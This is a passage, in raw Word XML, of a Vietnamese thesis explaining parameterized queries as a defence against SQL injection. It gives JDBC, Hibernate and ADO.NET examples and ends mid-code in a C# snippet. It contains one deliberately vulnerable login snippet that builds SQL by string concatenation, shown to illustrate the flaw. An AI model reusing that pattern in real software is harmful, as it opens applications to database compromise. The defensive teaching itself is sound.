    <w:p w:rsidR="00A970BE" w:rsidRPr="00B05040" w:rsidRDefault="008C75CB" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Giá trị bên phải không thỏa mãn ràng buộc đã được thiết lập, do đó không thể chuyển xuống lớp Database thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00455D2B" w:rsidRDefault="00455D2B" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc459822517"/>
      <w:r>
        <w:t>Sử dụng kỹ thuật Prepare Statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w:rsidR="00A909F8" w:rsidRDefault="00A909F8" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Như trong các phần trước, nguyên nhân gốc rễ của lỗi SQL injection nằm ở việc sinh ra câu truy vấn SQL, và gửi câu truy vấn này đến DBMS để thực thi. </w:t>
      </w:r>
      <w:r w:rsidR="008724FC">
        <w:t>Kỹ thuật này thường được gọi là xây chuỗi truy vấn động (</w:t>
      </w:r>
      <w:r w:rsidR="008724FC" w:rsidRPr="008724FC">
        <w:t>dynamic string building</w:t>
      </w:r>
      <w:r w:rsidR="008724FC">
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r w:rsidR="008724FC" w:rsidRPr="008724FC">
        <w:t>dynamic SQL</w:t>
      </w:r>
      <w:r w:rsidR="008724FC">
        <w:t xml:space="preserve">). Đây là nguyên nhân cơ bản gây ra lỗi SQL injection. </w:t>
      </w:r>
      <w:r w:rsidR="003E7AA8">
        <w:t xml:space="preserve">Để cung cấp việc an toàn hơn trong xây dựng câu truy vấn động, các ngôn ngữ lập trình và </w:t>
      </w:r>
      <w:r w:rsidR="003E7AA8" w:rsidRPr="003E7AA8">
        <w:t>database access application program interfaces (APIs)</w:t>
      </w:r>
      <w:r w:rsidR="003E7AA8">
        <w:t xml:space="preserve"> ngày nay cung cấp cho lập trình viên kỹ thuật tham số hóa câu truy vấn, </w:t>
      </w:r>
      <w:r w:rsidR="009A0CAF">
        <w:t>thông qua việc thiết lập vị trí của biến, tạo các ràng buộc với biến do người dùng nhập vào.</w:t>
      </w:r>
      <w:r w:rsidR="007700D0">
        <w:t xml:space="preserve"> Kỹ thuật này thường được gọi là tham số hóa (</w:t>
      </w:r>
      <w:r w:rsidR="007700D0" w:rsidRPr="007700D0">
        <w:t>parameterized statements</w:t>
      </w:r>
      <w:r w:rsidR="007700D0">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="009A0CAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007700D0">
        <w:t>là phương pháp cơ bản để giải quyết các vấn đề liên quan đến lỗ hổng SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="00D10288">
        <w:t>, được sử dụng phổ biến để sinh ra chuỗi truy vấn động. Phương pháp này cũng có lợi thế trong việc tối ưu câu truy vấn, giúp tăng hiệu quả của những câu truy vấn tiếp theo.</w:t>
      </w:r>
      <w:r w:rsidR="006674E2">
        <w:t xml:space="preserve"> Cùng xem xét ví dụ sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidTr="006674E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:lastRenderedPageBreak/>
              <w:t>Username = request(“username”)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:t>Password = request(“password”)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:t xml:space="preserve">Sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:t xml:space="preserve"> FROM users WHERE username=’” + Username + “‘ AND password=’”+ Password + “’”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:t>Result = Db.Execute(Sql)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:t>If (Result) /</w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:t xml:space="preserve"> successful login </w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006674E2" w:rsidRDefault="00621DB2" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Lần lượt, luận văn sẽ xem xét phương pháp triển khai </w:t>
      </w:r>
      <w:r w:rsidR="00A5726C">
        <w:t xml:space="preserve">tham số hóa trong </w:t>
      </w:r>
      <w:r w:rsidR="00A5726C" w:rsidRPr="00A5726C">
        <w:t xml:space="preserve">Java, C#, </w:t>
      </w:r>
      <w:r w:rsidR="00A5726C">
        <w:t>và</w:t>
      </w:r>
      <w:r w:rsidR="00A5726C" w:rsidRPr="00A5726C">
        <w:t xml:space="preserve"> PHP</w:t>
      </w:r>
      <w:r w:rsidR="00A5726C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AF144B">
        <w:t xml:space="preserve">Java cung cấp </w:t>
      </w:r>
      <w:r w:rsidR="00AF144B" w:rsidRPr="00AF144B">
        <w:t>Java Database Connectivity (JDBC)</w:t>
      </w:r>
      <w:r w:rsidR="00AF144B">
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:r w:rsidR="001F7343">
        <w:t xml:space="preserve"> (nằm trong java.sql và javax.sql namespaces)</w:t>
      </w:r>
      <w:r w:rsidR="00566767">
        <w:t xml:space="preserve"> là phương pháp để truy vấn cơ sở dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00570A7A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00570A7A" w:rsidRPr="00570A7A">
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidR="00570A7A">
        <w:t xml:space="preserve"> cung cấp nhiều phương pháp để truy vấn CSDL, trong đó có cả phương pháp tham số hóa dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="002F53E1">
        <w:t xml:space="preserve"> thông qua lớp </w:t>
      </w:r>
      <w:r w:rsidR="002F53E1" w:rsidRPr="002F53E1">
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r w:rsidR="00570A7A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF144B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E54D96">
        <w:t xml:space="preserve">Đoạn mã nguồn mắc lỗi trên sẽ được viết lại để đảm bảo an toàn. </w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4">
        <w:t xml:space="preserve">Lưu ý là các tham số sẽ được thêm vào qua các hàm </w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4" w:rsidRPr="005B6AC4">
        <w:t>set&lt;type&gt;</w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4">
        <w:t xml:space="preserve"> (ví dụ như </w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4" w:rsidRPr="005B6AC4">
        <w:t>setString</w:t>
      </w:r>
      <w:r w:rsidR="005B6AC4">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidTr="00B32ABA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>Connection con = DriverManager.getConnection(connectionString);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t xml:space="preserve">String sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00B32ABA">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00B32ABA">
              <w:t xml:space="preserve"> FROM users WHERE username=? AND password=?”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>PreparedStatement lookupUser = con.prepareStatement(sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>// Add parameters to SQL query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>lookupUser.setString(1, username); // add String to position 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>lookupUser.setString(2, password); // add String to position 2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B32ABA" w:rsidRPr="00B32ABA" w:rsidRDefault="00B32ABA" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B32ABA">
              <w:t>rs = lookupUser.executeQuery();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B3259C" w:rsidRDefault="00FE3533" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ngoài phương pháp trên, Java còn cung cấp Hibernate để truy vấn cơ sở dữ liệu, </w:t>
      </w:r>
      <w:r w:rsidR="00A706C3" w:rsidRPr="00A706C3">
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00A706C3">
        <w:t xml:space="preserve"> cung cấp khả năng cho phép ép ràng buộc biến - </w:t>
      </w:r>
      <w:r w:rsidR="00A706C3" w:rsidRPr="00A706C3">
        <w:t>binding variables</w:t>
      </w:r>
      <w:r w:rsidR="00A706C3">
        <w:t xml:space="preserve"> biến vào một tham số</w:t>
      </w:r>
      <w:r w:rsidR="00C43364">
        <w:t xml:space="preserve"> hóa</w:t>
      </w:r>
      <w:r w:rsidR="00D03A35">
        <w:t xml:space="preserve">. Phương pháp này cung cấp trong đối tượng </w:t>
      </w:r>
      <w:r w:rsidR="00D03A35" w:rsidRPr="00D03A35">
        <w:t>Query</w:t>
      </w:r>
      <w:r w:rsidR="0073015D">
        <w:t>, sử dụng các tham số hóa qua dấu hai chấm : (</w:t>
      </w:r>
      <w:r w:rsidR="0073015D" w:rsidRPr="0073015D">
        <w:t>:parameter</w:t>
      </w:r>
      <w:r w:rsidR="0073015D">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A706C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0073015D">
        <w:t>hoặc giống như JBDC (dấu ?):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidTr="00D21755">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t xml:space="preserve">String sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00D21755">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00D21755">
              <w:t xml:space="preserve"> FROM users WHERE username=:username AND” +“password=:password”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t>Query lookupUser = session.createQuery(sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CF6A85" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t>// Add parameters to SQL query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t>lookupUser.setString(“username”, username); // add username</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:t>lookupUser.setString(“password”, password); // add password</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D21755" w:rsidRPr="00D21755" w:rsidRDefault="00D21755" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D21755">
              <w:lastRenderedPageBreak/>
              <w:t>List rs = lookupUser.list();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00815231" w:rsidRDefault="00C16B7F" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">Đối với các ngôn ngữ lập trình .NET như C#, </w:t>
      </w:r>
      <w:r w:rsidR="00F67265" w:rsidRPr="00F67265">
        <w:t>Microsoft .NET</w:t>
      </w:r>
      <w:r w:rsidR="00F67265">
        <w:t xml:space="preserve"> cung cấp nhiều cách tham số hóa thông qua </w:t>
      </w:r>
      <w:r w:rsidR="00F67265" w:rsidRPr="00F67265">
        <w:t xml:space="preserve"> ADO.NET Framework</w:t>
      </w:r>
      <w:r w:rsidR="00F67265">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AE61AE">
        <w:t xml:space="preserve">ADO.NET cung cấp nhiều </w:t>
      </w:r>
      <w:r w:rsidR="00AE61AE" w:rsidRPr="00AE61AE">
        <w:t>data providers</w:t>
      </w:r>
      <w:r w:rsidR="00AE61AE">
        <w:t xml:space="preserve"> khác nhau, tùy thuộc vào loại CSDL người </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve">dùng tương tác: </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>System.Data.SqlClient</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve"> cho </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>Microsoft SQL Server</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>System.Data.OracleClient</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve"> cho </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>Oracle databases</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>System.Data.OleDb</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>System.Data.Odbc</w:t>
      </w:r>
      <w:r w:rsidR="008C1C90">
        <w:t xml:space="preserve"> cho </w:t>
      </w:r>
      <w:r w:rsidR="008C1C90" w:rsidRPr="008C1C90">
        <w:t>OLE DB</w:t>
      </w:r>
      <w:r w:rsidR="009B4478">
        <w:t xml:space="preserve"> và ODBC. Những </w:t>
      </w:r>
      <w:r w:rsidR="009B4478" w:rsidRPr="009B4478">
        <w:t>provider</w:t>
      </w:r>
      <w:r w:rsidR="009B4478">
        <w:t xml:space="preserve"> này phụ thuộc vào loại CSDL, driver mà người dùng sử dụng để truy cậ</w:t>
      </w:r>
      <w:r w:rsidR="00815231">
        <w:t>p, điều đó dẫn đến cú pháp cho việc tham số hóa dữ liệu là khác nhau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112DBF" w:rsidRPr="00112DBF" w:rsidRDefault="00112DBF" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc459803835"/>
      <w:r w:rsidRPr="00112DBF">
        <w:t xml:space="preserve">Bảng </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00313D3F">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Bảng \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00112DBF">
        <w:t>: Phương pháp tham số trong ADO.NET Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4696"/>
        <w:gridCol w:w="4592"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B5F5D" w:rsidTr="00112DBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRPr="003B5F5D" w:rsidRDefault="003B5F5D" w:rsidP="003B5F5D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B5F5D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Data Provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4592" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRPr="003B5F5D" w:rsidRDefault="003B5F5D" w:rsidP="003B5F5D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B5F5D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Parameter Syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5F5D" w:rsidTr="00112DBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="00872F45" w:rsidP="00872F45">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00872F45">
              <w:t xml:space="preserve">System.Data.SqlClient </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4592" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="00872F45" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00872F45">
              <w:t>@parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5F5D" w:rsidTr="00112DBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="00F679BF" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F679BF">
              <w:t>System.Data.OracleClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4592" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="001E45E1" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001E45E1">
              <w:t>:parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5F5D" w:rsidTr="00112DBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="00F679BF" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F679BF">
              <w:t>System.Data.OleDb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4592" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003B5F5D" w:rsidRDefault="008F0721" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Sử dụng dấu ? để đánh dấu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F679BF" w:rsidTr="00112DBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4696" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F679BF" w:rsidRDefault="00F679BF" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F679BF">
              <w:t>System.Data.Odbc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4592" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F679BF" w:rsidRDefault="008F0721" w:rsidP="00FE3533">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Sử dụng dấu ? để đánh dấu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00815231" w:rsidRDefault="00AD2AED" w:rsidP="00FE3533">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ví dụ với </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2AED">
        <w:t>SqlClient</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provider, đoạn mã trên sẽ được sửa lại như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidTr="00E72392">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>SqlConnection con = new SqlConnection(ConnectionString);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t xml:space="preserve">string Sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00E72392">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00E72392">
              <w:t xml:space="preserve"> FROM users WHERE username=@username” +“AND password=@password”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd = new SqlCommand(Sql, con);</w:t>
            </w:r>
          </w:p>
